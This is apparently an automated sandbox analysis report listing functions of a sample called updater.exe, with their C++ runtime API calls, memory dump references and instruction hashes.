Function 013F7069 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013F707A
int.LIBCPMT ref: 013F7091

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013F70CB
std::_Lockit::~_Lockit.LIBCPMT ref: 013F70EB
Concurrency::cancel_current_task.LIBCPMT ref: 013F70F8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 62d9f9d2e184d471bccba11ef4bf70164b634a77ace1740ef511927559ed3ad0
Instruction ID: e1060826da847c6161ec40512c589ad686e194523680a5c4247fd9573921cf96
Opcode Fuzzy Hash: 62d9f9d2e184d471bccba11ef4bf70164b634a77ace1740ef511927559ed3ad0
Instruction Fuzzy Hash: 0A01F575D101179BCB11EB68D854AFDBB70BFA4718F18000DEA11A76E0DF349E05C781

Uniqueness

Uniqueness Score: -1.00%

Function 01409541 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01409552
int.LIBCPMT ref: 01409569

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 014095A3
std::_Lockit::~_Lockit.LIBCPMT ref: 014095C3
Concurrency::cancel_current_task.LIBCPMT ref: 014095D0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: adb2e18b6d246ff8bda9c32aac2a150a7c6af3326221f121262dc6ef1b9ad7a7
Instruction ID: dd731e9a377abc6bbbd040d81202125f81f96cbfcbcbc30afc2d57dbff5c8fa1
Opcode Fuzzy Hash: adb2e18b6d246ff8bda9c32aac2a150a7c6af3326221f121262dc6ef1b9ad7a7
Instruction Fuzzy Hash: EC01D6729002169BCB12EB69D8506BEBBB1BFA4318F18045EEA05673E1EF749A01C781

Uniqueness

Uniqueness Score: -1.00%

Function 014095D6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014095E7
int.LIBCPMT ref: 014095FE

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 01409638
std::_Lockit::~_Lockit.LIBCPMT ref: 01409658
Concurrency::cancel_current_task.LIBCPMT ref: 01409665

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b051864b8e1c3d107e9ce28dc76f96ce60b479a9c593788725771424c7d38613
Instruction ID: f1a2ffca501edeeed8b6c86efec192eb8d1403a9b3b17ac3c3c09eb238e8be0d
Opcode Fuzzy Hash: b051864b8e1c3d107e9ce28dc76f96ce60b479a9c593788725771424c7d38613
Instruction Fuzzy Hash: 3301D671D001169BCB02EB69D854AFE7B75BFA4728F18041EEA09A73E1DF349A41C781

Uniqueness

Uniqueness Score: -1.00%

Function 01409795 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014097A6
int.LIBCPMT ref: 014097BD

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 014097F7
std::_Lockit::~_Lockit.LIBCPMT ref: 01409817
Concurrency::cancel_current_task.LIBCPMT ref: 01409824

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e5d05cb83a4776369d042cb97c7a73b1a428406cde3e2408d00d6c9748c07016
Instruction ID: a35770c5fcc2461a699b66c5291fa5d26165d077b50c38b16ba70b8e6fa6ab56
Opcode Fuzzy Hash: e5d05cb83a4776369d042cb97c7a73b1a428406cde3e2408d00d6c9748c07016
Instruction Fuzzy Hash: 7901D676900116DBCB16EB79D8506BEBBB4BFA4718F18011EDA14673F1DF349A01C791

Uniqueness

Uniqueness Score: -1.00%

Function 0140982A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140983B
int.LIBCPMT ref: 01409852

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 0140988C
std::_Lockit::~_Lockit.LIBCPMT ref: 014098AC
Concurrency::cancel_current_task.LIBCPMT ref: 014098B9

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c499e77534f8fd90a28dbbdb59036ae54fdb504dc09e6bf82fdbf4605d03efaf
Instruction ID: e75fd1d3c3829bf92770a177ea20c7585fd638b5948ca0dd7c0312948b40d51a
Opcode Fuzzy Hash: c499e77534f8fd90a28dbbdb59036ae54fdb504dc09e6bf82fdbf4605d03efaf
Instruction Fuzzy Hash: ED01D676D00116EBDB12EB69D8506BE7B70BFA4718F28041EE904A73E1DF359A41C781

Uniqueness

Uniqueness Score: -1.00%

Function 014296D1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 014296E9

Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B

_free.LIBCMT ref: 014296FB
_free.LIBCMT ref: 0142970D
_free.LIBCMT ref: 0142971F
_free.LIBCMT ref: 01429731

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a21c1df379e27d4ba574be7c1219fa2e5f8422b77b1a8ed05d1cc36ddbeec879
Instruction ID: 0df533d08bd3c167a9141d9955c22f757970eb72caa32028541e2ca5c27ab32d
Opcode Fuzzy Hash: a21c1df379e27d4ba574be7c1219fa2e5f8422b77b1a8ed05d1cc36ddbeec879
Instruction Fuzzy Hash: F8F04972505230EBD634EA69E4C0C2B7BDAEB50A14FE4180BF259D7620CA35FDC0CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 0140DB47 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
SetEvent.KERNEL32(?,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DC05
ResetEvent.KERNEL32(?,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DC11

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: f41a6428219ef726f849e0bc8e0f21e5c2dcf3d8a5558bde9f85be604b3890c5
Instruction ID: 6a706738c9734b39a14578df3a5b5b6f11d47f661be97d3295db4c1de1ec5c8b
Opcode Fuzzy Hash: f41a6428219ef726f849e0bc8e0f21e5c2dcf3d8a5558bde9f85be604b3890c5
Instruction Fuzzy Hash: 89013CB6902720EFC727EF59F848D957BB5FB09762701406AF9468733ACB709881DB90

Uniqueness

Uniqueness Score: -1.00%

Function 013DD98B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 371COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013DDA77
_strlen.LIBCMT ref: 013DDBD3
_strlen.LIBCMT ref: 013DDBF3

Strings

%s-mj%08X, xrefs: 013DDADE

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %s-mj%08X
API String ID: 4218353326-77246884
Opcode ID: a5a327700434d763058b00799792ef6ad06f9284171dcd5a136f7877211b0b32
Instruction ID: 9dff905fd22242d1ab43494f30e110caa13731214b4240daf4a0325ad32a4218
Opcode Fuzzy Hash: a5a327700434d763058b00799792ef6ad06f9284171dcd5a136f7877211b0b32
Instruction Fuzzy Hash: 5FD15B726183029FDB15DF6CD48092ABBE5BFC8618F14896EF889DB395DB70D801CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013B2685 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 013B268C
_Deallocate.LIBCONCRT ref: 013B2769

Strings

: ", xrefs: 013B2786
", ", xrefs: 013B27A5

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: DeallocateH_prolog2
String ID: ", "$: "
API String ID: 1002199092-747220369
Opcode ID: f60a34afa46b8f93c921fb97a2209d432f8560b2dea0821c2f10d09d556f50bc
Instruction ID: d3b4f0d546dc2874c688f2fda71981f4dee731d742ecde168f5d47a81f3b25f6
Opcode Fuzzy Hash: f60a34afa46b8f93c921fb97a2209d432f8560b2dea0821c2f10d09d556f50bc
Instruction Fuzzy Hash: CF41C270A01206AFDF14DF58C885BAEBBB5FF94718F04016EE901AB691DB70AD44CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0140C2A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0140C2AA

Part of subcall function 013F6F3F: std::_Lockit::_Lockit.LIBCPMT ref: 013F6F50
Part of subcall function 013F6F3F: int.LIBCPMT ref: 013F6F67
Part of subcall function 013F6F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 013F6FC1

_Find_elem.LIBCPMT ref: 0140C344

Strings

0123456789-, xrefs: 0140C2F1
0123456789-, xrefs: 0140C2F6

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789-$0123456789-
API String ID: 2124549159-2494171821
Opcode ID: 264b18beab12f529059ac2d0fb59c4879ee823ad333e2693a72547649125427e
Instruction ID: 075d64ecc3697b3655cceb3ccd5904f6f706151258c5ecd9566003a054f88af1
Opcode Fuzzy Hash: 264b18beab12f529059ac2d0fb59c4879ee823ad333e2693a72547649125427e
Instruction Fuzzy Hash: 26418D71900209EFCF0ADF99D980AEEBBB5FF14314F1001AAF511A72A1DB759A46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0141D249 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\updater.exe, xrefs: 0141D28C, 0141D293, 0141D2C9
+}, xrefs: 0141D29A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: +}$C:\Users\user\Desktop\updater.exe
API String ID: 0-3245524050
Opcode ID: e728bdfb5f9f6d14c8c87d13f420d48b9b67ab77b98595a6961681ada454e7fd
Instruction ID: 814324cad6de1a5cf25ef3cdc0f468f65b8d82fcc92236cc5b1b2717cb6a184f
Opcode Fuzzy Hash: e728bdfb5f9f6d14c8c87d13f420d48b9b67ab77b98595a6961681ada454e7fd
Instruction Fuzzy Hash: FE4182B1E00219AFDB269FDED88499FBBF8EF95710B14006BE50497335E7708A81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0140787E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01407885

Part of subcall function 013FC009: std::_Lockit::_Lockit.LIBCPMT ref: 013FC01A
Part of subcall function 013FC009: int.LIBCPMT ref: 013FC031
Part of subcall function 013FC009: std::_Lockit::~_Lockit.LIBCPMT ref: 013FC08B

_Find_elem.LIBCPMT ref: 01407921

Strings

%.0Lf, xrefs: 014078CC
0123456789-, xrefs: 014078D1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: %.0Lf$0123456789-
API String ID: 2124549159-3094241602
Opcode ID: 565677d92b67a88504fb87da9cb35de019b766743f8223e21604758ea6246a21
Instruction ID: ca07cfc89793f5592546f43e0276ef65f3110bbadab9415ab97935c9bd8a41e1
Opcode Fuzzy Hash: 565677d92b67a88504fb87da9cb35de019b766743f8223e21604758ea6246a21
Instruction Fuzzy Hash: DD41A03190021ADFDF12DFD9C984AEDBBB5FF14315F14016AE941AB2A4C730E956CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01407B63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01407B6A

Part of subcall function 013CEAE4: std::_Lockit::_Lockit.LIBCPMT ref: 013CEAF7
Part of subcall function 013CEAE4: int.LIBCPMT ref: 013CEB0E
Part of subcall function 013CEAE4: std::_Lockit::~_Lockit.LIBCPMT ref: 013CEB5E

_Find_elem.LIBCPMT ref: 01407C06

Strings

0123456789-, xrefs: 01407BB1
0123456789-, xrefs: 01407BB6

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789-$0123456789-
API String ID: 2124549159-2494171821
Opcode ID: 92d3a29fb9a398cb9534970e29360bcdf9dd08e8a112362862088af810e4ff7f
Instruction ID: 0fed7335702716ec17ea4f67edade60ee87dcecf29fbe1006e5957f057b446a8
Opcode Fuzzy Hash: 92d3a29fb9a398cb9534970e29360bcdf9dd08e8a112362862088af810e4ff7f
Instruction Fuzzy Hash: E641A431900219DFCF06DFD9C980AEE7BB5FF14315F04016AEA406B2A4C730E956CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01402666 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_Getvals.LIBCPMT ref: 014026BF
_Mpunct.LIBCPMT ref: 014026FA
_Mpunct.LIBCPMT ref: 01402714

Strings

$+xv, xrefs: 0140271F

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Mpunct$Getvals
String ID: $+xv
API String ID: 455491934-1686923651
Opcode ID: a536054cc82902cbb58f3f72aa835c7656ef467d61a80e24d6f223f3520e0bd4
Instruction ID: 37efbc6c0558e7e4b1b7436e6dca30c11ac383c9414f06bb47ebc4bba7d40446
Opcode Fuzzy Hash: a536054cc82902cbb58f3f72aa835c7656ef467d61a80e24d6f223f3520e0bd4
Instruction Fuzzy Hash: 0D21B5B1904B526FD722DF768894B3B7EE8AB1C200F04096FE599C7A90D774E651CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013D0F1B Relevance: 6.3, APIs: 4, Instructions: 348COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 013D1004
__aulldiv.LIBCMT ref: 013D101B
__aullrem.LIBCMT ref: 013D1026
__aulldvrm.LIBCMT ref: 013D1085

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __aullrem$__aulldiv__aulldvrm
String ID:
API String ID: 181600486-0
Opcode ID: 0e068ea99e23335b7125adaea46cec9fc938b0339b0b815c16e5b1f50a6f57c8
Instruction ID: af56656095986deec7ad05b9b22b3125f0cb02c1446ec402f7607aadb93fac83
Opcode Fuzzy Hash: 0e068ea99e23335b7125adaea46cec9fc938b0339b0b815c16e5b1f50a6f57c8
Instruction Fuzzy Hash: 12D18B326087818FD72ACE3D949066BBFE5BFCA608F188A5EF4C997251D730D546CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0142290A Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01422991

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
Instruction ID: b2fccac52869b96e3852f76b5fa66d16b18d05c90c5a266f135c2b7d97fdc87e
Opcode Fuzzy Hash: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
Instruction Fuzzy Hash: 03B14832A002669FDB21CF69C880FBFBFE5EF55350F54416BD844AB361D6B48A81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013FD2D0 Relevance: 6.3, APIs: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 013FD2D7
_strcspn.LIBCMT ref: 013FD33F
_strcspn.LIBCMT ref: 013FD35F
ctype.LIBCPMT ref: 013FD3CD

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: 03cc043357b9d5f78b2aa4b7ddb58c57eac882ed4068f77c321e17c70e5c3957
Instruction ID: f2d03c3fda80592b6b08bdf95fb2470e095e684d23ee99868459197c2908c610
Opcode Fuzzy Hash: 03cc043357b9d5f78b2aa4b7ddb58c57eac882ed4068f77c321e17c70e5c3957
Instruction Fuzzy Hash: 4FC15A71D0024A9FDF15DFD8C988AEEBBB9FF58314F14401EEA45AB251D730AA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013FD61C Relevance: 6.3, APIs: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 013FD623
_strcspn.LIBCMT ref: 013FD68B
_strcspn.LIBCMT ref: 013FD6AB
ctype.LIBCPMT ref: 013FD719

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: 2373e0c5e0d2c49fbbfc8656f95c113b61572ab1001cb66d9016159984cd6ac6
Instruction ID: 4f72376bed0be65c7d939c8b76bfce0103f5de589f564e8cd66777b6674ab388
Opcode Fuzzy Hash: 2373e0c5e0d2c49fbbfc8656f95c113b61572ab1001cb66d9016159984cd6ac6
